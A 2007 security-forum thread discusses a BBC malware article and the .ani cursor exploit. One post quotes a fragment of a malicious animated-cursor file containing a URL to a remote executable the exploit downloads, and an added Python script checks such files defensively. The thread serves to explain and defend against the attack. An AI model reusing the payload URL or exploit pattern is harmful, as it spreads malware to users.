BBC Malware News

Discussion in 'malware problems & news' started by Rainwalker, Apr 25, 2007.

Thread Status:
Not open for further replies.
  1. Rainwalker

    Rainwalker Registered Member

  2. aigle

    aigle Registered Member

    It's very concerning.
    Edit: Removed a sentence that's not so true!
     
    Last edited: Apr 25, 2007
  3. Rmus

    Rmus Exploit Analyst

    Very interesting article! A bit lame in the advice, however:

    For the Dolphins web page hack mentioned in the article -- the above advice was of no use on the first day when thousands were hit.

    sans.org added an update to their advisory:

    http://isc.sans.org/diary.html?storyid=2151
    Another example was the new *.ani exploit. The payload was triggered by the .ani file cached by means of code embedded in a web site:
    Code:
    RIFF  ACONanih$   $   ÿÿ 
    .....
    
    Å6‰D$aÃèþÿÿ  http://newasp.com.cn/xx.exe
    
    It's not surprising that the BBC article didn't mention White List protection, since Sophos deals primarily with Black List solutions -- solutions which are very effective when the companies have the signature in their database, and assuming that the user has the updates. How many average users update daily?

    Anyone, however, with even the now-maligned-out-of-date ProcessGuard would have been protected from this.

    Less esoteric solutions would include running as Limited User.

    In both cases, the OS being yet unpatched, the .ani file would cache, but the payload would not execute.

    Tricky, clever, sophisticated attack, ultimately using same old method of infection: download/install an executable.

    While articles like this are informative, the general reader is left with a feeling of uncertainty, maybe even dread: Gee, dare I visit any website? - unless the reader investigates more deeply into the situation and realizes that secure solutions are at hand!

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
    Last edited: Apr 25, 2007
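
An added example, not part of Rmus's post or of any product named in the thread: a triage check for animated-cursor files like the one dumped above. It walks the RIFF chunks, flags any `anih` chunk whose declared size is not the 36 bytes of the cursor header (0x24, the `$` in the dump), and lists embedded URLs in defanged form. `scan_ani`, the helper names and the sample bytes are constructed for illustration.

```python
import re
import struct

ANIH_SIZE = 36  # bytes in the cursor header chunk; 0x24 is the "$" in the dump
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def scan_ani(data: bytes) -> list:
    """Return triage findings for a RIFF/ACON (animated cursor) byte string."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON file"]
    findings, pos = [], 12
    while pos + 8 <= len(data):
        tag, size = struct.unpack_from("<4sI", data, pos)
        body = pos + 8
        if tag == b"LIST":
            pos = body + 4  # descend into the list: skip its 4-byte type
            continue
        if tag == b"anih" and size != ANIH_SIZE:
            findings.append(f"anih chunk at offset {pos}: size {size}, expected {ANIH_SIZE}")
        if body + size > len(data):
            findings.append(f"chunk {tag!r} at offset {pos} overruns the file")
            break
        pos = body + size + (size & 1)  # chunk bodies are padded to even length
    for m in URL_RE.finditer(data):
        # Defang so the report itself is not clickable.
        findings.append("embedded URL: " + m.group().decode("ascii").replace("http", "hxxp", 1))
    return findings


def chunk(tag: bytes, body: bytes) -> bytes:
    """Build one RIFF chunk (hypothetical helper for the samples below)."""
    return tag + struct.pack("<I", len(body)) + body + b"\0" * (len(body) & 1)


def riff(*chunks: bytes) -> bytes:
    """Wrap chunks in a RIFF/ACON container (hypothetical helper)."""
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a well-formed header, and a file whose anih chunk
# declares the wrong size and carries a URL (example.invalid is a placeholder).
GOOD = riff(chunk(b"anih", bytes(36)))
ODD = riff(chunk(b"anih", b"A" * 80 + b"http://example.invalid/x.exe"))

if __name__ == "__main__":
    for name, sample in (("GOOD", GOOD), ("ODD", ODD)):
        print(name, scan_ani(sample))
```

A check like this suits a proxy cache or mail gateway, where the file can be inspected before any client renders it.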
  4. aigle

    aigle Registered Member

    U are right. They will never suggest anything more than scanners. That makes sense. They need business.
     